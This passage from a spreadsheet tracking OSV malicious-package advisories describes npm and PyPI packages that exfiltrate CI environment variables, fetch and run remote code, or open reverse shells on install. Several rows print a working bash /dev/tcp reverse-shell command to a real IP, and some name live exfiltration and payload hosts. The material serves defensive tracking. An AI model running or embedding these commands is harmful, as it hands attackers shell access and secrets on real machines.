          <t>https://osv.dev/vulnerability/MAL-2026-16217</t>
        </is>
      </c>
    </row>
    <row r="1676">
      <c r="A1676" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1676" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1676" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16219</t>
        </is>
      </c>
      <c r="D1676" s="5" t="inlineStr"/>
      <c r="E1676" s="5" t="inlineStr"/>
      <c r="F1676" s="5" t="inlineStr"/>
      <c r="G1676" s="5" t="inlineStr"/>
      <c r="H1676" s="5" t="inlineStr"/>
      <c r="I1676" s="5" t="inlineStr"/>
      <c r="J1676" s="5" t="inlineStr"/>
      <c r="K1676" s="5" t="inlineStr"/>
      <c r="L1676" s="5" t="inlineStr">
        <is>
          <t>PyPI:licloud</t>
        </is>
      </c>
      <c r="M1676" s="5" t="inlineStr"/>
      <c r="N1676" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1676" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1676" s="5" t="inlineStr"/>
      <c r="Q1676" s="5" t="inlineStr"/>
      <c r="R1676" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: kam193 (5e2bddcfca980297be9856fbbc3eeab78253c51efe034bd92b9e8b52ed9aacc6)
Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.
---
Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research &amp; co, with clearly low-harm possibilities.
Campaign: GENERIC-standard-pypi-install-pentest
Reasons (based on the campaign):
 - The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.
 - The package overrides the install command in setup.py to execute malicious code during installation.
</t>
        </is>
      </c>
      <c r="S1676" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16219</t>
        </is>
      </c>
    </row>
    <row r="1677">
      <c r="A1677" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1677" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1677" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16220</t>
        </is>
      </c>
      <c r="D1677" s="5" t="inlineStr"/>
      <c r="E1677" s="5" t="inlineStr"/>
      <c r="F1677" s="5" t="inlineStr"/>
      <c r="G1677" s="5" t="inlineStr"/>
      <c r="H1677" s="5" t="inlineStr"/>
      <c r="I1677" s="5" t="inlineStr"/>
      <c r="J1677" s="5" t="inlineStr"/>
      <c r="K1677" s="5" t="inlineStr"/>
      <c r="L1677" s="5" t="inlineStr">
        <is>
          <t>npm:jexkcode</t>
        </is>
      </c>
      <c r="M1677" s="5" t="inlineStr"/>
      <c r="N1677" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1677" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1677" s="5" t="inlineStr"/>
      <c r="Q1677" s="5" t="inlineStr"/>
      <c r="R1677" s="5" t="inlineStr">
        <is>
          <t>Versions 1.0.1 through 1.1.4 of jexkcode automatically follow a hard-coded WhatsApp newsletter whenever a WhatsApp connection opens. The package waits three seconds and calls newsletterFollow without obtaining user consent or exposing a configuration option. The README advertises newsletter support but does not disclose this automatic account modification. Versions through 1.1.1 used a malformed newsletter JID; version 1.1.2 corrected it. Subsequent commits removed both failure and success logs, so version 1.1.4 performs the automatic follow without visible output. This behavior is unrelated to the package's stated functionality and modifies the user's WhatsApp account without authorization.</t>
        </is>
      </c>
      <c r="S1677" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16220</t>
        </is>
      </c>
    </row>
    <row r="1678">
      <c r="A1678" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1678" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1678" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16222</t>
        </is>
      </c>
      <c r="D1678" s="5" t="inlineStr"/>
      <c r="E1678" s="5" t="inlineStr"/>
      <c r="F1678" s="5" t="inlineStr"/>
      <c r="G1678" s="5" t="inlineStr"/>
      <c r="H1678" s="5" t="inlineStr"/>
      <c r="I1678" s="5" t="inlineStr"/>
      <c r="J1678" s="5" t="inlineStr"/>
      <c r="K1678" s="5" t="inlineStr"/>
      <c r="L1678" s="5" t="inlineStr">
        <is>
          <t>npm:@traktis/core</t>
        </is>
      </c>
      <c r="M1678" s="5" t="inlineStr"/>
      <c r="N1678" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1678" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1678" s="5" t="inlineStr"/>
      <c r="Q1678" s="5" t="inlineStr"/>
      <c r="R1678" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (45eb01f2eb09b73c0660d97e76d37ab8f7d62773cab9cdbdea65039a37dbb534)
package.json declares preinstall and postinstall lifecycle scripts that run curl against http://tko.amgsec.com/depconf/traktis-core/ on every `npm install`, carrying the output of whoami, hostname, and PWD as query parameters together with a base64-encoded dump of CI-related environment variables (GITHUB_*, CI_PROJECT, JENKINS_URL, BUILD_URL, GITLAB_*, RUNNER_*, HOSTNAME, USER, HOME). index.js is a one-line placeholder with no functionality, so the manifest is the entire payload. The scoped name combined with version 99.99.2 is the shape used to win dependency resolution against an internal package of the same name, causing internal build systems to install this artifact and beacon their identity and CI/repo metadata to a hardcoded non-publisher endpoint over plaintext HTTP.
</t>
        </is>
      </c>
      <c r="S1678" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16222</t>
        </is>
      </c>
    </row>
    <row r="1679">
      <c r="A1679" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1679" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1679" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16223</t>
        </is>
      </c>
      <c r="D1679" s="5" t="inlineStr"/>
      <c r="E1679" s="5" t="inlineStr"/>
      <c r="F1679" s="5" t="inlineStr"/>
      <c r="G1679" s="5" t="inlineStr"/>
      <c r="H1679" s="5" t="inlineStr"/>
      <c r="I1679" s="5" t="inlineStr"/>
      <c r="J1679" s="5" t="inlineStr"/>
      <c r="K1679" s="5" t="inlineStr"/>
      <c r="L1679" s="5" t="inlineStr">
        <is>
          <t>npm:@traktis/environment</t>
        </is>
      </c>
      <c r="M1679" s="5" t="inlineStr"/>
      <c r="N1679" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1679" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1679" s="5" t="inlineStr"/>
      <c r="Q1679" s="5" t="inlineStr"/>
      <c r="R1679" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (6b9bdabc95f4e8bc70e348557c1cae7d2447d9bd1405ac7a23945ded47ec04a8)
package.json declares preinstall and postinstall lifecycle scripts that invoke curl against the hardcoded cleartext endpoint http://tko.amgsec.com/depconf/traktis-environment/, sending the output of whoami, hostname, cwd, a timestamp, and a base64-encoded dump of CI/build environment variables matched by the pattern GITHUB_*, CI_PROJECT, JENKINS_URL, BUILD_URL, GITLAB_*, RUNNER_*, HOSTNAME, USER, HOME as query parameters. index.js is a 55-byte placeholder comment and author is listed as 'anonymous'; the manifest lifecycle scripts are the entire functional payload. The name occupies the @traktis scope at version 99.99.2, a version-inflation shape consistent with dependency-confusion resolution against an internal package of the same name. Installing the package on any developer workstation or CI runner automatically transmits build-system identity and any credential-shaped environment variables covered by the grep pattern to a third-party host over plain HTTP.
</t>
        </is>
      </c>
      <c r="S1679" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16223</t>
        </is>
      </c>
    </row>
    <row r="1680">
      <c r="A1680" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1680" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1680" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16224</t>
        </is>
      </c>
      <c r="D1680" s="5" t="inlineStr"/>
      <c r="E1680" s="5" t="inlineStr"/>
      <c r="F1680" s="5" t="inlineStr"/>
      <c r="G1680" s="5" t="inlineStr"/>
      <c r="H1680" s="5" t="inlineStr"/>
      <c r="I1680" s="5" t="inlineStr"/>
      <c r="J1680" s="5" t="inlineStr"/>
      <c r="K1680" s="5" t="inlineStr"/>
      <c r="L1680" s="5" t="inlineStr">
        <is>
          <t>npm:process-mite</t>
        </is>
      </c>
      <c r="M1680" s="5" t="inlineStr"/>
      <c r="N1680" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1680" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1680" s="5" t="inlineStr"/>
      <c r="Q1680" s="5" t="inlineStr"/>
      <c r="R1680" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">This package is part of a malicious npm campaign published by the `max233` account. Importing the package automatically launches a detached JavaScript loader that retrieves and executes additional code from npoint.io. The retrieved payload communicates with an attacker-controlled server and implements clipboard collection, keyboard and mouse event collection, filesystem scanning, and theft of Chrome extension storage.
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (4763fac30373bc805351d0eb8e0989cde9dcd2ab2c1b18f9eb7bde4e61765191)
On import of the package main, index.js auto-invokes an initialize() routine that spawns a detached `node loader.js` process. loader.js performs an HTTPS GET against the hardcoded endpoint https://api.npoint.io/33e8d008c334b060adad, base64-decodes the `code` field of the returned JSON, and executes the decoded string via `new Function("require","__dirname","__filename","module","exports", decodedCode)(...)`, granting the fetched payload full Node.js capabilities on the installer's host. npoint.io is a user-editable JSON hosting service, so the executed code is mutable by whoever controls the note and is unpinned and unverified. package.json and README present the package as a 'runtime-utils' library exporting getRuntimeInfo, but no such API is shipped; the advertised purpose is a cover story for the dropper. In-source comments self-describe the module as an embedded remote-code-execution client.
</t>
        </is>
      </c>
      <c r="S1680" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16224</t>
        </is>
      </c>
    </row>
    <row r="1681">
      <c r="A1681" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1681" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1681" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16225</t>
        </is>
      </c>
      <c r="D1681" s="5" t="inlineStr"/>
      <c r="E1681" s="5" t="inlineStr"/>
      <c r="F1681" s="5" t="inlineStr"/>
      <c r="G1681" s="5" t="inlineStr"/>
      <c r="H1681" s="5" t="inlineStr"/>
      <c r="I1681" s="5" t="inlineStr"/>
      <c r="J1681" s="5" t="inlineStr"/>
      <c r="K1681" s="5" t="inlineStr"/>
      <c r="L1681" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-cccon-meeb</t>
        </is>
      </c>
      <c r="M1681" s="5" t="inlineStr"/>
      <c r="N1681" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1681" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1681" s="5" t="inlineStr"/>
      <c r="Q1681" s="5" t="inlineStr"/>
      <c r="R1681" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (b6c0ca5cf1881ed03c4a8b91832bcd8f65854bd36d9b764843370d26f599c2a0)
postinstall.js runs automatically on `npm install` and executes a bash reverse shell to the hardcoded remote host 14.225.210.85:80 via `/dev/tcp`, granting that host interactive command execution on the installing machine. Execution is gated by `os.hostname() === 'ubuntu-fc-uvm'`: on non-matching hosts the script exits silently, while on the targeted hostname it spawns `bash -i &gt;&amp; /dev/tcp/14.225.210.85/80 0&gt;&amp;1`. The hostname allowlist is a detonation guard that keeps the payload dormant on generic scanners and typical developer machines while firing on the intended target. The package is presented as a Strapi plugin but ships no plugin functionality relevant to this behavior in the postinstall path; the lifecycle script's sole effect is the reverse-shell attempt.
</t>
        </is>
      </c>
      <c r="S1681" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16225</t>
        </is>
      </c>
    </row>
    <row r="1682">
      <c r="A1682" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1682" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1682" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16226</t>
        </is>
      </c>
      <c r="D1682" s="5" t="inlineStr"/>
      <c r="E1682" s="5" t="inlineStr"/>
      <c r="F1682" s="5" t="inlineStr"/>
      <c r="G1682" s="5" t="inlineStr"/>
      <c r="H1682" s="5" t="inlineStr"/>
      <c r="I1682" s="5" t="inlineStr"/>
      <c r="J1682" s="5" t="inlineStr"/>
      <c r="K1682" s="5" t="inlineStr"/>
      <c r="L1682" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-ccip-meeb</t>
        </is>
      </c>
      <c r="M1682" s="5" t="inlineStr"/>
      <c r="N1682" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1682" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1682" s="5" t="inlineStr"/>
      <c r="Q1682" s="5" t="inlineStr"/>
      <c r="R1682" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (fbf7a24da69c80ba7475efcb12c97f1be8b4ebbed42b47131ac9716ff38d5620)
strapi-plugin-ccip-meeb@3.6.8 declares scripts.postinstall = 'node postinstall.js', so postinstall.js runs automatically on npm install. The script imports child_process and checks os.hostname() against a hardcoded value ('ubuntu-fc-uvm'); when the hostname matches, it executes `bash -c "bash -i &gt;&amp; /dev/tcp/14.225.210.85/80 0&gt;&amp;1"`, opening an interactive reverse shell from the installer's host to 14.225.210.85:80. The hostname gate causes the payload to remain dormant on unrelated hosts and fire only in the attacker's expected target environment, a targeting/sandbox-evasion pattern. The package name mimics a legitimate Strapi plugin scope but the shipped code has no plugin functionality consistent with that name; the postinstall reverse shell is the substantive behavior.
</t>
        </is>
      </c>
      <c r="S1682" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16226</t>
        </is>
      </c>
    </row>
    <row r="1683">
      <c r="A1683" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1683" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1683" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16227</t>
        </is>
      </c>
      <c r="D1683" s="5" t="inlineStr"/>
      <c r="E1683" s="5" t="inlineStr"/>
      <c r="F1683" s="5" t="inlineStr"/>
      <c r="G1683" s="5" t="inlineStr"/>
      <c r="H1683" s="5" t="inlineStr"/>
      <c r="I1683" s="5" t="inlineStr"/>
      <c r="J1683" s="5" t="inlineStr"/>
      <c r="K1683" s="5" t="inlineStr"/>
      <c r="L1683" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-ccrec-meeb</t>
        </is>
      </c>
      <c r="M1683" s="5" t="inlineStr"/>
      <c r="N1683" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1683" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1683" s="5" t="inlineStr"/>
      <c r="Q1683" s="5" t="inlineStr"/>
      <c r="R1683" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (27dd1178f43debcd9babc6630aa303b6953e7572d994f8efe3acc75db2cc878e)
The package's postinstall lifecycle script (postinstall.js) executes a bash /dev/tcp reverse shell to the hardcoded remote endpoint 14.225.210.85:80, giving the operator of that host an interactive shell on the installer's machine. Execution is gated by an os.hostname() equality check against 'ubuntu-fc-uvm'; on a matching host the script retries the connection up to 5 times, and on any other host it exits silently. The hostname gate is an evasion mechanism that hides the payload from generic installers and sandboxes while enabling targeted exploitation. The behavior fires automatically on npm install via scripts.postinstall with no user interaction. The package name mimics a Strapi plugin but ships no plugin functionality consistent with the declared purpose.
</t>
        </is>
      </c>
      <c r="S1683" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16227</t>
        </is>
      </c>
    </row>
    <row r="1684">
      <c r="A1684" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1684" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1684" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16228</t>
        </is>
      </c>
      <c r="D1684" s="5" t="inlineStr"/>
      <c r="E1684" s="5" t="inlineStr"/>
      <c r="F1684" s="5" t="inlineStr"/>
      <c r="G1684" s="5" t="inlineStr"/>
      <c r="H1684" s="5" t="inlineStr"/>
      <c r="I1684" s="5" t="inlineStr"/>
      <c r="J1684" s="5" t="inlineStr"/>
      <c r="K1684" s="5" t="inlineStr"/>
      <c r="L1684" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-ccrev-meeb</t>
        </is>
      </c>
      <c r="M1684" s="5" t="inlineStr"/>
      <c r="N1684" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1684" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1684" s="5" t="inlineStr"/>
      <c r="Q1684" s="5" t="inlineStr"/>
      <c r="R1684" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (cbcdfb404042de180795640d5ea266d8fe50afff5d180b3da0eab17f979369f3)
postinstall.js executes automatically on `npm install` and opens a bash reverse shell via /dev/tcp redirection to the hardcoded remote endpoint 14.225.210.85:80, retrying up to 5 times. Execution is gated by an os.hostname() check against 'ubuntu-fc-uvm', so the payload only fires on installers whose hostname matches that value; on matching hosts the attacker obtains an interactive shell on the installer's machine. The package name mimics an unrelated Strapi plugin, and no legitimate plugin functionality is present alongside the postinstall payload.
</t>
        </is>
      </c>
      <c r="S1684" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16228</t>
        </is>
      </c>
    </row>
    <row r="1685">
      <c r="A1685" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1685" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1685" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16229</t>
        </is>
      </c>
      <c r="D1685" s="5" t="inlineStr"/>
      <c r="E1685" s="5" t="inlineStr"/>
      <c r="F1685" s="5" t="inlineStr"/>
      <c r="G1685" s="5" t="inlineStr"/>
      <c r="H1685" s="5" t="inlineStr"/>
      <c r="I1685" s="5" t="inlineStr"/>
      <c r="J1685" s="5" t="inlineStr"/>
      <c r="K1685" s="5" t="inlineStr"/>
      <c r="L1685" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-conresh-meeb</t>
        </is>
      </c>
      <c r="M1685" s="5" t="inlineStr"/>
      <c r="N1685" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1685" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1685" s="5" t="inlineStr"/>
      <c r="Q1685" s="5" t="inlineStr"/>
      <c r="R1685" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (d117fca143f7c8f02261755b923b29cae47f8fdcca2f69f169e26a5601b3661a)
The package declares a postinstall lifecycle hook ("postinstall": "node postinstall.js") that executes on every `npm install`. postinstall.js invokes child_process.exec with a bash reverse-shell command connecting the installer's host to the hardcoded remote endpoint 14.225.210.85:80 via /dev/tcp, redirecting stdio to give the remote party an interactive shell on the installer's machine. Execution is gated by a hostname allowlist (matching 'ubuntu-fc-uvm'), and a retry loop plus a log file at /tmp/postinstall-revshell.log indicate a persistent, targeted deployment. The plugin name mimics the Strapi plugin namespace but ships no plugin functionality relevant to that framing.
</t>
        </is>
      </c>
      <c r="S1685" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16229</t>
        </is>
      </c>
    </row>
    <row r="1686">
      <c r="A1686" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1686" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1686" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16230</t>
        </is>
      </c>
      <c r="D1686" s="5" t="inlineStr"/>
      <c r="E1686" s="5" t="inlineStr"/>
      <c r="F1686" s="5" t="inlineStr"/>
      <c r="G1686" s="5" t="inlineStr"/>
      <c r="H1686" s="5" t="inlineStr"/>
      <c r="I1686" s="5" t="inlineStr"/>
      <c r="J1686" s="5" t="inlineStr"/>
      <c r="K1686" s="5" t="inlineStr"/>
      <c r="L1686" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-feedmeeb</t>
        </is>
      </c>
      <c r="M1686" s="5" t="inlineStr"/>
      <c r="N1686" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1686" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1686" s="5" t="inlineStr"/>
      <c r="Q1686" s="5" t="inlineStr"/>
      <c r="R1686" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (7ecf1e41fb24d24ffe7b55319dda947ae30bfabb9266e38c17e1231cf4492ec5)
strapi-plugin-feedmeeb@3.6.8 ships a package.json postinstall hook that executes postinstall.js on npm install. The script constructs a bash reverse shell of the form `bash -i &gt;&amp; /dev/tcp/14.225.210.85/80 0&gt;&amp;1` and exec's it via child_process, with retry logic, giving the operator of 14.225.210.85 interactive command execution on the installer's host. Alongside the shell, the script collects os.hostname() and os.userInfo().username to identify the compromised machine. The package presents itself as a Strapi plugin but its install-time behavior is unrelated to any plugin function.
</t>
        </is>
      </c>
      <c r="S1686" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16230</t>
        </is>
      </c>
    </row>
    <row r="1687">
      <c r="A1687" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1687" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1687" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16231</t>
        </is>
      </c>
      <c r="D1687" s="5" t="inlineStr"/>
      <c r="E1687" s="5" t="inlineStr"/>
      <c r="F1687" s="5" t="inlineStr"/>
      <c r="G1687" s="5" t="inlineStr"/>
      <c r="H1687" s="5" t="inlineStr"/>
      <c r="I1687" s="5" t="inlineStr"/>
      <c r="J1687" s="5" t="inlineStr"/>
      <c r="K1687" s="5" t="inlineStr"/>
      <c r="L1687" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-honey-meeb</t>
        </is>
      </c>
      <c r="M1687" s="5" t="inlineStr"/>
      <c r="N1687" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1687" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1687" s="5" t="inlineStr"/>
      <c r="Q1687" s="5" t="inlineStr"/>
      <c r="R1687" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (752c0a1146068824e355a38b25add15f092d7cea6f846c143b5b2d2210de6766)
The package's postinstall lifecycle script (postinstall.js) spawns a Python-based reverse shell that opens a TCP socket to the hardcoded IP 14.225.210.85:80, dup2's stdin/stdout/stderr onto the socket, and calls pty.spawn('sh'), yielding an interactive remote shell on the installer's host at npm install time. Execution is gated by an os.hostname() check against 'ubuntu-fc-uvm', with self-labeled log strings such as '[+] Starting reverse shell' and '[+] proceeding with exploit' — a targeting/evasion pattern indicative of an intentional attack rather than a demo. The package name resembles the legitimate Strapi plugin ecosystem, but the shipped install-time payload has no legitimate purpose.
</t>
        </is>
      </c>
      <c r="S1687" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16231</t>
        </is>
      </c>
    </row>
    <row r="1688">
      <c r="A1688" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1688" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1688" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16232</t>
        </is>
      </c>
      <c r="D1688" s="5" t="inlineStr"/>
      <c r="E1688" s="5" t="inlineStr"/>
      <c r="F1688" s="5" t="inlineStr"/>
      <c r="G1688" s="5" t="inlineStr"/>
      <c r="H1688" s="5" t="inlineStr"/>
      <c r="I1688" s="5" t="inlineStr"/>
      <c r="J1688" s="5" t="inlineStr"/>
      <c r="K1688" s="5" t="inlineStr"/>
      <c r="L1688" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-listcc-meeb</t>
        </is>
      </c>
      <c r="M1688" s="5" t="inlineStr"/>
      <c r="N1688" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1688" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1688" s="5" t="inlineStr"/>
      <c r="Q1688" s="5" t="inlineStr"/>
      <c r="R1688" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (63bef6a3804e282781fb0eaea1ffd045ef3b236aefd0668de11549aba1ada8b0)
strapi-plugin-listcc-meeb@3.6.8 declares scripts.postinstall = 'node postinstall.js' (and points main at the same file), so `npm install` auto-executes postinstall.js. That script spawns a Python one-liner via child_process that opens a socket to the hardcoded IP 14.225.210.85:80 and attaches a PTY-backed /bin/sh to the remote peer, yielding an interactive reverse shell on the installer's host. Execution is gated only by a hostname check ('ubuntu-fc-uvm'). Package metadata masquerades as a Strapi plugin ('Strapi plugin for enhanced functionality') while the repository/homepage is a placeholder github.com/user/... URL and the shipped code contains no plugin functionality — only the reverse-shell payload.
</t>
        </is>
      </c>
      <c r="S1688" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16232</t>
        </is>
      </c>
    </row>
    <row r="1689">
      <c r="A1689" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1689" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1689" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-16233</t>
        </is>
      </c>
      <c r="D1689" s="5" t="inlineStr"/>
      <c r="E1689" s="5" t="inlineStr"/>
      <c r="F1689" s="5" t="inlineStr"/>
      <c r="G1689" s="5" t="inlineStr"/>
      <c r="H1689" s="5" t="inlineStr"/>
      <c r="I1689" s="5" t="inlineStr"/>
      <c r="J1689" s="5" t="inlineStr"/>
      <c r="K1689" s="5" t="inlineStr"/>
      <c r="L1689" s="5" t="inlineStr">
        <is>
          <t>npm:strapi-plugin-maylog-meeb</t>
        </is>
      </c>
      <c r="M1689" s="5" t="inlineStr"/>
      <c r="N1689" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1689" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P1689" s="5" t="inlineStr"/>
      <c r="Q1689" s="5" t="inlineStr"/>
      <c r="R1689" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8d714c1585f058d5ac528832398ffe2d0035fd8b60e97e461cdfa8e1533e851c)
The package's postinstall.js lifecycle script executes automatically on `npm install` and spawns a python3 reverse shell that connects to the hardcoded remote endpoint 14.225.210.85:80 and attaches an interactive `sh` PTY to the socket, giving the operator of that endpoint full shell access to the installer's host. Prior to the connect, the script collects host identifiers (os.hostname(), os.userInfo().username, process.pid) and writes them to /tmp/postinstall-revshell.log; those identifiers are also exposed to the remote endpoint once the shell attaches. The script retries on failure. The package name and description masquerade as a Strapi audit-log plugin; no functionality in the tarball corresponds to that stated purpose.
</t>
        </is>
      </c>
      <c r="S1689" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-16233</t>
        </is>
      </c>
    </row>
    <row r="1690">
      <c r="A1690" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1690" s="5" t="inlineStr">
        <is>
